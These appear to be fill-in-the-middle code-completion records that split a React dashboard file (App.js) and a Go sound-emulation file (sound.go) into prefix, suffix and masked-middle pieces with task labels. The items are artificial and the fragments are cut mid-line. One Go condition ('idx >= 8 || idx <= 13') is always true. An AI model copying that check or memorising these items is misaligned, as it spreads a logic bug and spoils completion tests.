// vertical padding + font size from searchIcon
paddingLeft: `calc(1em + ${theme.spacing(4)}px)`,
transition: theme.transitions.create('width'),
width: '100%',
[theme.breakpoints.up('sm')]: {
width: '17.5ch',
'&:focus': {
width: '33ch',
},
},
},
root: {
display: 'flex',
},
toolbar:{
paddingRight:24, //keep right padding when drawer closed
},
toolbarIcon: {
display: 'flex',
alignItems: 'center',
justifyContent: 'flex-end',
padding: '0 8px',
...theme.mixins.toolbar,
},
appBar:{
height:'7%',
zIndex: theme.zIndex.drawer + 1,
transition: theme.transitions.create(['width','margin'],{
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
},
appBarShift:{
marginLeft: drawerWidth,
height:'7%',
width: `calc(100% - ${drawerWidth}px)`,
transition: theme.transitions.create(['width','margin'],{
easing:theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
menuButton: {
marginRight: 36,
},
menuButtonHidden: {
display: 'none',
},
drawerPaper: {
color : 'primary',
position: 'relative',
whiteSpace: 'nowrap',
width: drawerWidth,
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
drawerPaperClose: {
color : 'primary',
overflowX: 'hidden',
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
width: theme.spacing(7),
[theme.breakpoints.up('sm')]: {
width: theme.spacing(6.4),
},
},
appBarSpacer: theme.mixins.toolbar,
content: {
flexGrow: 1,
maxWidth:'400vh',
height: '100vh',
overflow: 'auto',
background: 'linear-gradient(45deg, #eceff1 70%, #212121 100%)',
},
}));
function App(props) {
const classes = useStyles();
const [auth] = React.useState(true);
const [open,setOpen]= React.useState(true);
const [anchorEl,setAnchorEl] = React.useState(null);
const op = Boolean(anchorEl);
const handleMenu = (event) => {
setAnchorEl(event.currentTarget);
};
const handleClose = () => {
setAnchorEl(null);
};
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () =>{
setOpen(false);
};
let history = useHistory();
return (
<ThemeProvider theme={theme}>
<Router>
<div className={classes.root}>
<CssBaseline />
<AppBar position="absolute" color ="#fafafa" className={clsx(classes.appBar, open && classes.appBarShift)}>
<Toolbar className={classes.toolbar}>
<IconButton
edge="start"
color="inherit"
aria-label="open drawer"
onClick={handleDrawerOpen}
className={clsx(classes.menuButton, open && classes.menuButtonHidden)}
>
<MenuIcon />
</IconButton>
<div className={classes.search}>
<div className={classes.searchIcon}>
<SearchIcon />
</div>
<InputBase
placeholder="Buscar transacciones, facturas, ayuda…"
classes={{
root: classes.inputRoot,
input: classes.inputInput,
}}
inputProps={{ 'aria-label': 'search' }}
/>
</div>
<IconButton color="inherit" >
<Badge variant="dot" color="secondary">
<NotificationsIcon />
</Badge>
</IconButton>
<Box p={0.5} component="h1" variant="h6" color="inherit" noWrap className={classes.tabs} >
<Typography>
Produmar
<IconButton color = "inherit">
<ArrowDropDownIcon />
</IconButton>
</Typography>
</Box>
{auth && (
<div>
<IconButton
aria-label="account of current user"
aria-controls="menu-appbar"
aria-haspopup="true"
onClick={handleMenu}
color="inherit"
>
<AccountCircle />
</IconButton>
<Menu
id="menu-appbar"
anchorEl={anchorEl}
anchorOrigin={{
vertical: 'top',
horizontal: 'right',
}}
keepMounted
|
import Registro_Operador from './components/formularios/Registro_Operador.js';
import Registro_Cosechadora from './components/formularios/Registro_Cosechadora.js';
|
random_line_split
|
App.js
|
'@material-ui/icons/ChevronLeft';
import MenuIcon from '@material-ui/icons/Menu';
import SearchIcon from '@material-ui/icons/Search';
import AccountCircle from '@material-ui/icons/AccountCircle';
import NotificationsIcon from '@material-ui/icons/Notifications';
import ArrowDropDownIcon from '@material-ui/icons/ArrowDropDown';
import ListItems from './listItems.js'; // HACE UNA IMPORTACION DE LAS
import IMAGEN from './img/Imagen.js';
import {useHistory} from "react-router-dom";
import { BrowserRouter as Router, Route, Switch} from 'react-router-dom';
import ProdumarDuran from './Pages/ProdumarDuran.js';
import ProdumarTaura from './Pages/ProdumarTaura.js';
import Inicio from './Pages/Inicio.js';
import Registro_CLIENTE from './components/formularios/Registro_CLIENTE.js';
import Registro_Camaronera from './components/formularios/Registro_Camaronera.js';
import Registro_Operador from './components/formularios/Registro_Operador.js';
import Registro_Cosechadora from './components/formularios/Registro_Cosechadora.js';
let theme = createMuiTheme({
palette: {
primary: {
light: '#63ccff',
main: '#009be5',
dark: '#006db3',
},
},
typography: {
h5: {
fontWeight: 500,
fontSize: 26,
letterSpacing: 0.5,
},
},
shape: {
borderRadius: 8,
},
props: {
MuiTab: {
disableRipple: true,
},
},
mixins: {
toolbar: {
minHeight: 48,
},
},
});
theme = {
...theme,
overrides: {
MuiDrawer: {
paper: {
backgroundColor: '#212121', //Cambia el color del menú de opciones
},
},
MuiButton: {
label: {
textTransform: 'none',
},
contained: {
boxShadow: 'none',
'&:active': {
boxShadow: 'none',
},
},
},
MuiTabs: {
root: {
marginLeft: theme.spacing(1),
},
indicator: {
height: 3,
borderTopLeftRadius: 3,
borderTopRightRadius: 3,
backgroundColor: theme.palette.common.white,
},
},
MuiTab: {
root: {
textTransform: 'none',
margin: '0 16px',
minWidth: 0,
padding: 0,
[theme.breakpoints.up('md')]: {
padding: 0,
minWidth: 0,
},
},
},
MuiIconButton: {
root: {
padding: theme.spacing(1),
},
},
MuiTooltip: {
tooltip: {
borderRadius: 4,
},
},
MuiDivider: {
root: {
backgroundColor: '#404854',
},
},
MuiListItemText: {
primary: {
fontWeight: theme.typography.fontWeightMedium,
},
},
MuiListItemIcon: {
root: {
color: 'inherit',
marginRight: 0,
'& svg': {
fontSize: 20,
},
},
},
MuiAvatar: {
root: {
width: 32,
height: 32,
},
},
},
};
const drawerWidth = 240;
const useStyles = makeStyles((theme) =>({
tabs: {
borderLeft: `1px solid ${theme.palette.divider}`,
marginLeft: 1,
},
search: {
position: 'relative',
flexGrow: 1,
borderRadius: theme.shape.borderRadius,
backgroundColor: fade(theme.palette.common.white, 0.15),
'&:hover': {
backgroundColor: fade(theme.palette.common.white, 0.25),
},
marginLeft: 0,
width: '100%',
[theme.breakpoints.up('sm')]: {
marginLeft: theme.spacing(1),
width: 'auto',
},
},
searchIcon: {
padding: theme.spacing(0, 2),
height: '100%',
position: 'absolute',
pointerEvents: 'none',
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
},
inputRoot: {
color: 'inherit',
},
inputInput: {
padding: theme.spacing(1, 1, 1, 0),
// vertical padding + font size from searchIcon
paddingLeft: `calc(1em + ${theme.spacing(4)}px)`,
transition: theme.transitions.create('width'),
width: '100%',
[theme.breakpoints.up('sm')]: {
width: '17.5ch',
'&:focus': {
width: '33ch',
},
},
},
root: {
display: 'flex',
},
toolbar:{
paddingRight:24, //keep right padding when drawer closed
},
toolbarIcon: {
display: 'flex',
alignItems: 'center',
justifyContent: 'flex-end',
padding: '0 8px',
...theme.mixins.toolbar,
},
appBar:{
height:'7%',
zIndex: theme.zIndex.drawer + 1,
transition: theme.transitions.create(['width','margin'],{
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
},
appBarShift:{
marginLeft: drawerWidth,
height:'7%',
width: `calc(100% - ${drawerWidth}px)`,
transition: theme.transitions.create(['width','margin'],{
easing:theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
menuButton: {
marginRight: 36,
},
menuButtonHidden: {
display: 'none',
},
drawerPaper: {
color : 'primary',
position: 'relative',
whiteSpace: 'nowrap',
width: drawerWidth,
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
drawerPaperClose: {
color : 'primary',
overflowX: 'hidden',
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
width: theme.spacing(7),
[theme.breakpoints.up('sm')]: {
width: theme.spacing(6.4),
},
},
appBarSpacer: theme.mixins.toolbar,
content: {
flexGrow: 1,
maxWidth:'400vh',
height: '100vh',
overflow: 'auto',
background: 'linear-gradient(45deg, #eceff1 70%, #212121 100%)',
},
}));
function App(props) {
|
return (
<ThemeProvider theme={theme}>
<Router>
<div className={classes.root}>
<CssBaseline />
<AppBar position="absolute" color ="#fafafa" className={clsx(classes.appBar, open && classes.appBarShift)}>
<Toolbar className={classes.toolbar}>
<IconButton
edge="start"
color="inherit"
aria-label="open drawer"
onClick={handleDrawerOpen}
className={clsx(classes.menuButton, open && classes.menuButtonHidden)}
>
<MenuIcon />
</IconButton>
<div className={classes.search}>
<div className={classes.searchIcon}>
<SearchIcon />
</div>
<InputBase
placeholder="Buscar transacciones, facturas, ayuda…"
classes={{
root: classes.inputRoot,
input: classes.inputInput,
}}
inputProps={{ 'aria-label': 'search' }}
/>
</div>
<IconButton color="inherit" >
<Badge variant="dot" color="secondary">
<NotificationsIcon />
</Badge>
</IconButton>
<Box p={0.5} component="h1" variant="h6" color="inherit" noWrap className={classes.tabs} >
<Typography>
Produmar
<IconButton color = "inherit">
<ArrowDropDownIcon />
</IconButton>
</Typography>
</Box>
{auth && (
<div>
<IconButton
aria-label="account of current user"
aria-controls="menu-appbar"
aria-haspopup="true"
onClick={handleMenu}
color="inherit"
>
<AccountCircle />
</IconButton>
<Menu
id="menu-appbar"
anchorEl={anchorEl}
anchorOrigin={{
vertical: 'top',
horizontal: 'right',
}}
keepMounted
transform
|
const classes = useStyles();
const [auth] = React.useState(true);
const [open,setOpen]= React.useState(true);
const [anchorEl,setAnchorEl] = React.useState(null);
const op = Boolean(anchorEl);
const handleMenu = (event) => {
setAnchorEl(event.currentTarget);
};
const handleClose = () => {
setAnchorEl(null);
};
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () =>{
setOpen(false);
};
let history = useHistory();
|
identifier_body
|
App.js
|
'@material-ui/icons/ChevronLeft';
import MenuIcon from '@material-ui/icons/Menu';
import SearchIcon from '@material-ui/icons/Search';
import AccountCircle from '@material-ui/icons/AccountCircle';
import NotificationsIcon from '@material-ui/icons/Notifications';
import ArrowDropDownIcon from '@material-ui/icons/ArrowDropDown';
import ListItems from './listItems.js'; // HACE UNA IMPORTACION DE LAS
import IMAGEN from './img/Imagen.js';
import {useHistory} from "react-router-dom";
import { BrowserRouter as Router, Route, Switch} from 'react-router-dom';
import ProdumarDuran from './Pages/ProdumarDuran.js';
import ProdumarTaura from './Pages/ProdumarTaura.js';
import Inicio from './Pages/Inicio.js';
import Registro_CLIENTE from './components/formularios/Registro_CLIENTE.js';
import Registro_Camaronera from './components/formularios/Registro_Camaronera.js';
import Registro_Operador from './components/formularios/Registro_Operador.js';
import Registro_Cosechadora from './components/formularios/Registro_Cosechadora.js';
let theme = createMuiTheme({
palette: {
primary: {
light: '#63ccff',
main: '#009be5',
dark: '#006db3',
},
},
typography: {
h5: {
fontWeight: 500,
fontSize: 26,
letterSpacing: 0.5,
},
},
shape: {
borderRadius: 8,
},
props: {
MuiTab: {
disableRipple: true,
},
},
mixins: {
toolbar: {
minHeight: 48,
},
},
});
theme = {
...theme,
overrides: {
MuiDrawer: {
paper: {
backgroundColor: '#212121', //Cambia el color del menú de opciones
},
},
MuiButton: {
label: {
textTransform: 'none',
},
contained: {
boxShadow: 'none',
'&:active': {
boxShadow: 'none',
},
},
},
MuiTabs: {
root: {
marginLeft: theme.spacing(1),
},
indicator: {
height: 3,
borderTopLeftRadius: 3,
borderTopRightRadius: 3,
backgroundColor: theme.palette.common.white,
},
},
MuiTab: {
root: {
textTransform: 'none',
margin: '0 16px',
minWidth: 0,
padding: 0,
[theme.breakpoints.up('md')]: {
padding: 0,
minWidth: 0,
},
},
},
MuiIconButton: {
root: {
padding: theme.spacing(1),
},
},
MuiTooltip: {
tooltip: {
borderRadius: 4,
},
},
MuiDivider: {
root: {
backgroundColor: '#404854',
},
},
MuiListItemText: {
primary: {
fontWeight: theme.typography.fontWeightMedium,
},
},
MuiListItemIcon: {
root: {
color: 'inherit',
marginRight: 0,
'& svg': {
fontSize: 20,
},
},
},
MuiAvatar: {
root: {
width: 32,
height: 32,
},
},
},
};
const drawerWidth = 240;
const useStyles = makeStyles((theme) =>({
tabs: {
borderLeft: `1px solid ${theme.palette.divider}`,
marginLeft: 1,
},
search: {
position: 'relative',
flexGrow: 1,
borderRadius: theme.shape.borderRadius,
backgroundColor: fade(theme.palette.common.white, 0.15),
'&:hover': {
backgroundColor: fade(theme.palette.common.white, 0.25),
},
marginLeft: 0,
width: '100%',
[theme.breakpoints.up('sm')]: {
marginLeft: theme.spacing(1),
width: 'auto',
},
},
searchIcon: {
padding: theme.spacing(0, 2),
height: '100%',
position: 'absolute',
pointerEvents: 'none',
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
},
inputRoot: {
color: 'inherit',
},
inputInput: {
padding: theme.spacing(1, 1, 1, 0),
// vertical padding + font size from searchIcon
paddingLeft: `calc(1em + ${theme.spacing(4)}px)`,
transition: theme.transitions.create('width'),
width: '100%',
[theme.breakpoints.up('sm')]: {
width: '17.5ch',
'&:focus': {
width: '33ch',
},
},
},
root: {
display: 'flex',
},
toolbar:{
paddingRight:24, //keep right padding when drawer closed
},
toolbarIcon: {
display: 'flex',
alignItems: 'center',
justifyContent: 'flex-end',
padding: '0 8px',
...theme.mixins.toolbar,
},
appBar:{
height:'7%',
zIndex: theme.zIndex.drawer + 1,
transition: theme.transitions.create(['width','margin'],{
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
},
appBarShift:{
marginLeft: drawerWidth,
height:'7%',
width: `calc(100% - ${drawerWidth}px)`,
transition: theme.transitions.create(['width','margin'],{
easing:theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
menuButton: {
marginRight: 36,
},
menuButtonHidden: {
display: 'none',
},
drawerPaper: {
color : 'primary',
position: 'relative',
whiteSpace: 'nowrap',
width: drawerWidth,
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
drawerPaperClose: {
color : 'primary',
overflowX: 'hidden',
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
width: theme.spacing(7),
[theme.breakpoints.up('sm')]: {
width: theme.spacing(6.4),
},
},
appBarSpacer: theme.mixins.toolbar,
content: {
flexGrow: 1,
maxWidth:'400vh',
height: '100vh',
overflow: 'auto',
background: 'linear-gradient(45deg, #eceff1 70%, #212121 100%)',
},
}));
function A
|
props) {
const classes = useStyles();
const [auth] = React.useState(true);
const [open,setOpen]= React.useState(true);
const [anchorEl,setAnchorEl] = React.useState(null);
const op = Boolean(anchorEl);
const handleMenu = (event) => {
setAnchorEl(event.currentTarget);
};
const handleClose = () => {
setAnchorEl(null);
};
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () =>{
setOpen(false);
};
let history = useHistory();
return (
<ThemeProvider theme={theme}>
<Router>
<div className={classes.root}>
<CssBaseline />
<AppBar position="absolute" color ="#fafafa" className={clsx(classes.appBar, open && classes.appBarShift)}>
<Toolbar className={classes.toolbar}>
<IconButton
edge="start"
color="inherit"
aria-label="open drawer"
onClick={handleDrawerOpen}
className={clsx(classes.menuButton, open && classes.menuButtonHidden)}
>
<MenuIcon />
</IconButton>
<div className={classes.search}>
<div className={classes.searchIcon}>
<SearchIcon />
</div>
<InputBase
placeholder="Buscar transacciones, facturas, ayuda…"
classes={{
root: classes.inputRoot,
input: classes.inputInput,
}}
inputProps={{ 'aria-label': 'search' }}
/>
</div>
<IconButton color="inherit" >
<Badge variant="dot" color="secondary">
<NotificationsIcon />
</Badge>
</IconButton>
<Box p={0.5} component="h1" variant="h6" color="inherit" noWrap className={classes.tabs} >
<Typography>
Produmar
<IconButton color = "inherit">
<ArrowDropDownIcon />
</IconButton>
</Typography>
</Box>
{auth && (
<div>
<IconButton
aria-label="account of current user"
aria-controls="menu-appbar"
aria-haspopup="true"
onClick={handleMenu}
color="inherit"
>
<AccountCircle />
</IconButton>
<Menu
id="menu-appbar"
anchorEl={anchorEl}
anchorOrigin={{
vertical: 'top',
horizontal: 'right',
}}
keepMounted
|
pp(
|
identifier_name
|
sound.go
|
loop := int((ch.SndCnt.Value >> 27) & 3)
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold")
}
v.on = false // will put true at the end of the function, if no error
v.mem = ptr[:length]
v.pos = 0
v.delay = 3
v.tmr = uint32(ch.SndTmr.Value)
v.mode = mode
v.loop = loop
var sum uint64
switch v.mode {
case kModeAdpcm:
v.delay = 11
sum = crc64.Checksum(v.mem, ctable)
if buf, found := snd.cache.Get(sum); found {
v.mem = buf.([]byte)
} else {
v.mem = snd.adpcmDecompress(v.mem)
// go ioutil.WriteFile(fmt.Sprintf("%x.raw", sum), v.mem, 0666)
snd.cache.Add(sum, v.mem)
}
case kModePsgNoise:
v.delay = 1
if idx >= 8 || idx <= 13 {
// Mode PSG
v.mem = psgTable[(ch.SndCnt.Value>>24)&3][:]
} else {
log.ModSound.WithField("ch", idx).Error("unsupported PSG/noise mode on this channel")
return
}
}
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold value")
}
log.ModSound.InfoZ("start channel").
Int("ch", idx).
Int("mode", mode).
Hex32("rpos", ch.SndSad.Value).
Uint32("len", length).
Uint("ptlen", uint(ch.SndPnt.Value)*4).
Hex64("sum", sum).
Int("loop", loop).
Hex16("tmr", ch.SndTmr.Value).
Int64("clk", nds7.Cycles()).
End()
v.on = true
}
func (snd *HwSound) stopChannel(idx int) {
v := &snd.voice[idx]
v.on = false
snd.Ch[idx].SndCnt.Value &^= 1 << 31
log.ModSound.InfoZ("stop channel").Int("idx", idx).End()
}
func (snd *HwSound) loopChannel(idx int) uint {
if snd.voice[idx].loop == kLoopInfinite {
off := snd.Ch[idx].SndPnt.Value * 4
switch snd.voice[idx].mode {
case kModeAdpcm:
off -= 4
fallthrough
case kMode16bit:
off /= 2
}
return uint(off)
}
return kPosNoLoop
}
func (snd *HwSound) WriteSNDCAP0CNT(old, new uint8) { snd.writeSNDCAPCNT(0, old, new) }
func (snd *HwSound) WriteSNDCAP1CNT(old, new uint8) { snd.writeSNDCAPCNT(1, old, new) }
func (snd *HwSound) w
|
idx int, old, new uint8) {
if (old^new)&(1<<7) != 0 {
if new&(1<<7) != 0 {
snd.startCapture(idx, new)
} else {
snd.stopCapture(idx, new)
}
}
}
func (snd *HwSound) startCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = true
cap.loop = cnt&(1<<2) == 0
cap.bit8 = cnt&(1<<3) != 0
cap.single = cnt&(1<<1) != 0
cap.add = cnt&(1<<1) != 0
cap.wpos = *cap.regdad
cap.reset = uint32(snd.Ch[idx*2+1].SndTmr.Value)
cap.tmr = cap.reset
log.ModSound.InfoZ("start capture").
Int("idx", idx).
Bool("loop", cap.loop).
Bool("8bit", cap.bit8).
Bool("single", cap.single).
Bool("add", cap.add).
Hex32("wpos", cap.wpos).
Hex32("wlen", *cap.reglen*4).
Hex16("tmr", uint16(cap.reset)).
Int64("clk", nds7.Cycles()).
End()
}
func (snd *HwSound) stopCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = false
}
var (
voldiv = [4]uint32{0, 1, 2, 4}
adpcmIndexTable = [8]int16{-1, -1, -1, -1, 2, 4, 6, 8}
adpcmTable = [89]uint16{
0x0007, 0x0008, 0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x000E, 0x0010, 0x0011, 0x0013, 0x0015,
0x0017, 0x0019, 0x001C, 0x001F, 0x0022, 0x0025, 0x0029, 0x002D, 0x0032, 0x0037, 0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC, 0x1EA5, 0x21B6, 0x2515, 0x28CA, 0x2CDF, 0x315B, 0x364B, 0x3BB9, 0x41B2, 0x4844, 0x4F7E,
0x5771, 0x602F, 0x69CE, 0x7462, 0x7FFF,
}
psgTable = [8][16]uint8{
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f}, // _______-
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f}, // ______--
{0x01, 0x80, 0x
|
riteSNDCAPCNT(
|
identifier_name
|
sound.go
|
snd.capture[0].regdad = &snd.SndCap0Dad.Value
snd.capture[1].regdad = &snd.SndCap1Dad.Value
snd.capture[0].reglen = &snd.SndCap0Len.Value
snd.capture[1].reglen = &snd.SndCap1Len.Value
hwio.MustInitRegs(snd)
return snd
}
func (ch *HwSoundChannel) WriteSNDCNT(old, new uint32) {
if (old^new)&(1<<31) != 0 {
if new&(1<<31) != 0 {
ch.snd.startChannel(ch.idx)
} else {
ch.snd.stopChannel(ch.idx)
}
}
}
func (ch *HwSoundChannel) WriteSNDTMR(_, new uint16) {
// Å write to SNDTMR also takes effect while the voice is playing
// so copy the value into the latched register we increment at every tick.
ch.snd.voice[ch.idx].tmr = uint32(new)
}
func (snd *HwSound) startChannel(idx int) {
ch := &snd.Ch[idx]
v := &snd.voice[idx]
ptr := snd.Bus.FetchPointer(ch.SndSad.Value)
mode := int((ch.SndCnt.Value >> 29) & 3)
length := uint32(ch.SndPnt.Value)*4 + ch.SndLen.Value*4
loop := int((ch.SndCnt.Value >> 27) & 3)
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold")
}
v.on = false // will put true at the end of the function, if no error
v.mem = ptr[:length]
v.pos = 0
v.delay = 3
v.tmr = uint32(ch.SndTmr.Value)
v.mode = mode
v.loop = loop
var sum uint64
switch v.mode {
case kModeAdpcm:
v.delay = 11
sum = crc64.Checksum(v.mem, ctable)
if buf, found := snd.cache.Get(sum); found {
v.mem = buf.([]byte)
} else {
v.mem = snd.adpcmDecompress(v.mem)
// go ioutil.WriteFile(fmt.Sprintf("%x.raw", sum), v.mem, 0666)
snd.cache.Add(sum, v.mem)
}
case kModePsgNoise:
v.delay = 1
if idx >= 8 || idx <= 13 {
// Mode PSG
v.mem = psgTable[(ch.SndCnt.Value>>24)&3][:]
} else {
log.ModSound.WithField("ch", idx).Error("unsupported PSG/noise mode on this channel")
return
}
}
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold value")
}
log.ModSound.InfoZ("start channel").
Int("ch", idx).
Int("mode", mode).
Hex32("rpos", ch.SndSad.Value).
Uint32("len", length).
Uint("ptlen", uint(ch.SndPnt.Value)*4).
Hex64("sum", sum).
Int("loop", loop).
Hex16("tmr", ch.SndTmr.Value).
Int64("clk", nds7.Cycles()).
End()
v.on = true
}
func (snd *HwSound) stopChannel(idx int) {
v := &snd.voice[idx]
v.on = false
snd.Ch[idx].SndCnt.Value &^= 1 << 31
log.ModSound.InfoZ("stop channel").Int("idx", idx).End()
}
func (snd *HwSound) loopChannel(idx int) uint {
if snd.voice[idx].loop == kLoopInfinite {
off := snd.Ch[idx].SndPnt.Value * 4
switch snd.voice[idx].mode {
case kModeAdpcm:
off -= 4
fallthrough
case kMode16bit:
off /= 2
}
return uint(off)
}
return kPosNoLoop
}
func (snd *HwSound) WriteSNDCAP0CNT(old, new uint8) { snd.writeSNDCAPCNT(0, old, new) }
func (snd *HwSound) WriteSNDCAP1CNT(old, new uint8) { snd.writeSNDCAPCNT(1, old, new) }
func (snd *HwSound) writeSNDCAPCNT(idx int, old, new uint8) {
if (old^new)&(1<<7) != 0 {
if new&(1<<7) != 0 {
snd.startCapture(idx, new)
} else {
snd.stopCapture(idx, new)
}
}
}
func (snd *HwSound) startCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = true
cap.loop = cnt&(1<<2) == 0
cap.bit8 = cnt&(1<<3) != 0
cap.single = cnt&(1<<1) != 0
cap.add = cnt&(1<<1) != 0
cap.wpos = *cap.regdad
cap.reset = uint32(snd.Ch[idx*2+1].SndTmr.Value)
cap.tmr = cap.reset
log.ModSound.InfoZ("start capture").
Int("idx", idx).
Bool("loop", cap.loop).
Bool("8bit", cap.bit8).
Bool("single", cap.single).
Bool("add", cap.add).
Hex32("wpos", cap.wpos).
Hex32("wlen", *cap.reglen*4).
Hex16("tmr", uint16(cap.reset)).
Int64("clk", nds7.Cycles()).
End()
}
func (snd *HwSound) stopCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = false
}
var (
voldiv = [4]uint32{0, 1, 2, 4}
adpcmIndexTable = [8]int16{-1, -1, -1, -1, 2, 4, 6, 8}
adpcmTable = [89]uint16{
0x0007, 0x0008, 0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x000E, 0x0010, 0x0011, 0x0013, 0x0015,
0x0017, 0x0019, 0x001C, 0x001F, 0x0022, 0x0025, 0x0029, 0x002D, 0x0032, 0x0037, 0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC
|
{
hwio.MustInitRegs(&snd.Ch[i])
snd.Ch[i].snd = snd
snd.Ch[i].idx = i
}
|
conditional_block
|
|
sound.go
|
0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC, 0x1EA5, 0x21B6, 0x2515, 0x28CA, 0x2CDF, 0x315B, 0x364B, 0x3BB9, 0x41B2, 0x4844, 0x4F7E,
0x5771, 0x602F, 0x69CE, 0x7462, 0x7FFF,
}
psgTable = [8][16]uint8{
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f}, // _______-
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f}, // ______--
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _____---
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ____----
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ___-----
{0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // __------
{0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _-------
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80}, // ________
}
)
func (snd *HwSound) adpcmDecompress(buf []byte) []byte {
// ioutil.WriteFile("sound.adpcm", buf, 0666)
head := binary.LittleEndian.Uint32(buf[:4])
buf = buf[4:]
pcm := int32(int16(head & 0xFFFF))
index := int16(head>>16) & 0x7F
res := make([]byte, 0, len(buf)*4)
dec := func(sample uint8) {
diff := adpcmTable[index] / 8
diff += (adpcmTable[index] / 4) * uint16((sample>>0)&1)
diff += (adpcmTable[index] / 2) * uint16((sample>>1)&1)
diff += (adpcmTable[index] / 1) * uint16((sample>>2)&1)
if sample&8 == 0 {
pcm += int32(diff)
if pcm > 0x7FFF {
pcm = 0x7FFF
}
} else {
pcm -= int32(diff)
if pcm < -0x7FFF {
pcm = -0x7FFF
}
}
index += adpcmIndexTable[sample&7]
if index < 0 {
index = 0
} else if index > 88 {
index = 88
}
}
for i := range buf {
dec(buf[i] & 0xF)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
dec(buf[i] >> 4)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
}
return res
}
